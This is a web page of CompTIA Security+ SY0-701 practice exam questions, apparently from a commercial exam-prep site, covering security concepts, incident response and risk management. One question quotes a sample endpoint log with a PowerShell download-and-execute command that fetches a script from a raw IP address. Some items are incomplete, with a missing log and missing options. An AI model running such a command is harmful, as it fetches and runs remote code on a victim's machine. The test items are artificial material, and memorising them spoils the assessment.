Summer Sale Special - Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: xmaspas7

Easiest Solution 2 Pass Your Certification Exams

SY0-701 CompTIA Security+ Exam 2026 Free Practice Exam Questions (2026 Updated)

Prepare effectively for your CompTIA SY0-701 CompTIA Security+ Exam 2026 certification with our extensive collection of free, high-quality practice questions. Each question is designed to mirror the actual exam format and objectives, complete with comprehensive answers and detailed explanations. Our materials are regularly updated for 2026, ensuring you have the most current resources to build confidence and succeed on your first attempt.

Page: 4 / 7
Total 887 questions

Which of the following best describe why a process would require a two-person integrity security control?

A.

To Increase the chance that the activity will be completed in half of the time the process would take only one user to complete

B.

To permit two users from another department to observe the activity that is being performed by an authorized user

C.

To reduce the risk that the procedures are performed incorrectly or by an unauthorized user

D.

To allow one person to perform the activity while being recorded on the CCTV camera

Which of the following types of identification methods can be performed on a deployed application during runtime?

A.

Dynamic analysis

B.

Code review

C.

Package monitoring

D.

Bug bounty

Which of the following definitions best describes the concept of log co-relation?

A.

Combining relevant logs from multiple sources into ono location

B.

Searching end processing, data to identify patterns of malicious activity

C.

Making a record of the events that occur in the system

D.

Analyzing the log files of the system components

Which of the following types of vulnerabilities involves attacking a system to access adjacent hosts?

A.

VM escape

B.

Side loading

C.

Remote code execution

D.

Resource exhaustion

Which of the following automation use cases would best enhance the security posture of an organization by rapidly updating permissions when employees leave a company?

A.

Provisioning resources

B.

Disabling access

C.

Reviewing change approvals

D.

Escalating permission requests

Which of the following best describes the practice of researching laws and regulations related to information security operations within a specific industry?

A.

Compliance reporting

B.

GDPR

C.

Due diligence

D.

Attestation

A security practitioner completes a vulnerability assessment on a company’s network and finds several vulnerabilities, which the operations team remediates. Which of the following should be done next?

A.

Conduct an audit.

B.

Initiate a penetration test.

C.

Rescan the network.

D.

Submit a report.

During a recent log review, an analyst found evidence of successful injection attacks. Which of the following will best address this issue?

A.

Authentication

B.

Secure cookies

C.

Static code analysis

D.

Input validation

Which of the following Is a common, passive reconnaissance technique employed by penetration testers in the early phases of an engagement?

A.

Open-source intelligence

B.

Port scanning

C.

Pivoting

D.

Exploit validation

An organization is developing a security program that conveys the responsibilities associated with the general operation of systems and software within the organization. Which of the following documents would most likely communicate these expectations?

A.

Business continuity plan

B.

Change management procedure

C.

Acceptable use policy

D.

Software development life cycle policy

Which of the following must be considered when designing a high-availability network? (Choose two).

A.

Ease of recovery

B.

Ability to patch

C.

Physical isolation

D.

Responsiveness

E.

Attack surface

F.

Extensible authentication

A security manager wants to reduce the number of steps required to identify and contain basic threats. Which of the following will help achieve this goal?

A.

SOAR

B.

SIEM

C.

DMARC

D.

NIDS

The management team reports employees are missing features on company-provided tablets, causing productivity issues. The team directs IT to resolve the issue within 48 hours. Which of the following is the best solution?

A.

EDR

B.

COPE

C.

MDM

D.

FDE

A client asked a security company to provide a document outlining the project, the cost, and the completion time frame. Which of the following documents should the company provide to the client?

A.

MSA

B.

SLA

C.

BPA

D.

SOW

An administrator finds that all user workstations and servers are displaying a message that is associated with files containing an extension of .ryk. Which of the following types of infections is present on the systems?

A.

Virus

B.

Trojan

C.

Spyware

D.

Ransomware

A security administrator ' s account accesses company IT systems from an airport. Shortly after, the administrator ' s manager asks about critical configuration changes made by the administrator ' s account. The administrator was not aware of these changes. Which of the following attack methods did the attacker most likely use?

A.

Rogue access point

B.

Shoulder surfing

C.

Skimming

D.

Keylogger

A U.S.-based cloud-hosting provider wants to expand its data centers to new international locations. Which of the following should the hosting provider consider first?

A.

Local data protection regulations

B.

Risks from hackers residing in other countries

C.

Impacts to existing contractual obligations

D.

Time zone differences in log correlation

Which of the following security concepts is being followed when implementing a product that offers protection against DDoS attacks?

A.

Availability

B.

Non-repudiation

C.

Integrity

D.

Confidentiality

The Chief Information Security Officer wants to put security measures in place to protect PlI. The organization needs to use its existing labeling and classification system to accomplish this goal. Which of the following would most likely be configured to meet the requirements?

A.

Tokenization

B.

S/MIME

C.

DLP

D.

MFA

A security engineer is installing an IPS to block signature-based attacks in the environment. Which of the following modes will best accomplish this task?

A.

Monitor

B.

Sensor

C.

Audit

D.

Active

An administrator installs an SSL certificate on a new system. During testing, errors indicate that the certificate is not trusted. The administrator has verified with the issuing CA and has validated the private key. Which of the following should the administrator check for next?

A.

If the wildcard certificate is configured

B.

If the certificate signing request is valid

C.

If the root certificate is installed

D.

If the public key is configured

A Chief Information Security Officer (CISO) develops information security policies that relate to the software development methodology. Which of the following will the CISO most likely include in the organization ' s documentation?

A.

Peer review requirements

B.

Multifactor authentication

C.

Branch protection tests

D.

Secrets management configurations

A security team wants to work with the development team to ensure WAF policies are automatically created when applications are deployed. Which concept describes this capability?

A.

IaC

B.

IoT

C.

IoC

D.

IaaS

A university employee logged on to the academic server and attempted to guess the system administrators ' log-in credentials. Which of the following security measures should the university have implemented to detect the employee ' s attempts to gain access to the administrators ' accounts?

A.

Two-factor authentication

B.

Firewall

C.

Intrusion prevention system

D.

User activity logs

A manager receives an email that contains a link to receive a refund. After hovering over the link, the manager notices that the domain ' s URL points to a suspicious link. Which of the following security practices helped the manager to identify the attack?

A.

End user training

B.

Policy review

C.

URL scanning

D.

Plain text email

Which of the following describes the process of concealing code or text inside a graphical image?

A.

Symmetric encryption

B.

Hashing

C.

Data masking

D.

Steganography

Several employees received a fraudulent text message from someone claiming to be the Chief Executive Officer (CEO). The message stated:

“I’m in an airport right now with no access to email. I need you to buy gift cards for employee recognition awards. Please send the gift cards to following email address.”

Which of the following are the best responses to this situation? (Choose two).

A.

Cancel current employee recognition gift cards.

B.

Add a smishing exercise to the annual company training.

C.

Issue a general email warning to the company.

D.

Have the CEO change phone numbers.

E.

Conduct a forensic investigation on the CEO ' s phone.

F.

Implement mobile device management.

A security operations center determines that the malicious activity detected on a server is normal. Which of the following activities describes the act of ignoring detected activity in the future?

A.

Tuning

B.

Aggregating

C.

Quarantining

D.

Archiving

Which of the following best distinguishes hacktivists from insider threats?

A.

Hacktivists often act based on ideological or political beliefs rather than organizational access.

B.

Hacktivists are generally employed by the target organization at the time of attack.

C.

Hacktivists often target organizations without prior access or internal affiliation.

D.

Hacktivists are primarily motivated by personal conflicts or employment-related dissatisfaction.

Which of the following can best contribute to prioritizing patch applications?

A.

CVSS

B.

SCAP

C.

OSINT

D.

CVE

In order to cut costs, a company decides to implement a bring-your-own-device policy. The security team wants a solution that will reduce risk to company data, especially in cases in which devices are lost or stolen. Which of the following tools is best to address this concern?

A.

Mobile device management

B.

Endpoint detection and response

C.

Host-based intrusion detection system

D.

Data loss prevention

A company wants to protect a specialized legacy platform that controls the physical flow of gas inside of pipes. Which of the following environments does the company need to secure to best achieve this goal?

A.

IaaS

B.

SCADA

C.

SDN

D.

IoT

A company performs risk analysis on its equipment and estimates it will experience about ten incidents over a five-year period. Which of the following is the correct ARO for the equipment?

A.

2

B.

5

C.

10

D.

50

After multiple phishing simulations, the Chief Security Officer announces a new program that incentivizes employees to not click phishing links in the upcoming quarter. Which of the following security awareness execution techniques does this represent?

Which of the following are cases in which an engineer should recommend the decommissioning of a network device? (Select two).

A.

The device has been moved from a production environment to a test environment.

B.

The device is configured to use cleartext passwords.

C.

The device is moved to an isolated segment on the enterprise network.

D.

The device is moved to a different location in the enterprise.

E.

The device ' s encryption level cannot meet organizational standards.

F.

The device is unable to receive authorized updates.

While troubleshooting an internal resource ' s poor performance for an end user, a network engineer performs a traceroute on the end device and receives the following output:

C:\User > tracert 10.100.15.20

Tracing route to [internal.resource.org] 10.100.15.20

over a maximum of 30 hops:

1 200 ms 200 ms 200 ms 10.20.10.10

2 5 ms 3 ms 3 ms 10.20.10.1

3 20 ms 20 ms 10 ms 10.25.10.10

4 10 ms 8 ms 10 ms 10.30.110.1

5 5 ms 6 ms 3 ms 10.100.15.20

The engineer performs a traceroute from a device that is not experiencing poor performance but is connected to the same port. The engineer receives the following output:

C:\Engineer > tracert 10.100.15.20

Tracing route to [internal.resource.org] 10.100.15.20

over a maximum of 30 hops:

1 5 ms 3 ms 3 ms 10.20.10.1

2 20 ms 20 ms 10 ms 10.25.10.10

3 10 ms 8 ms 10 ms 10.30.110.1

4 5 ms 6 ms 3 ms 10.100.15.20

Which of the following is most likely occurring?

A.

ARP cache poisoning

B.

On-path attack

C.

Resource exhaustion

D.

DNS spoofing

A company is developing a critical system for the government and storing project information on a fileshare. Which of the following describes how this data will most likely be classified? (Select two).

A.

Private

B.

Confidential

C.

Public

D.

Operational

E.

Urgent

F.

Restricted

A security analyst reviews the following endpoint log:

powershell -exec bypass -Command " IEX (New-Object Net.WebClient).DownloadString(http://176.30.40.50/evil.ps1 " )

Which of the following logs will help confirm an established connection to IP address 176.30.40.50?

A.

System event logs

B.

EDR logs

C.

Firewall logs

D.

Application logs

A security analyst is reviewing logs and discovers the following:

Which of the following should be used lo best mitigate this type of attack?

A.

Input sanitization

B.

Secure cookies

C.

Static code analysis

D.

Sandboxing

Which of the following should an internal auditor check for first when conducting an audit of the organization’s risk management program?

A.

Policies and procedures

B.

Asset management

C.

Vulnerability assessment

D.

Business impact analysis

Page: 4 / 7
Total 887 questions
Copyright © 2014-2026 Solution2Pass. All Rights Reserved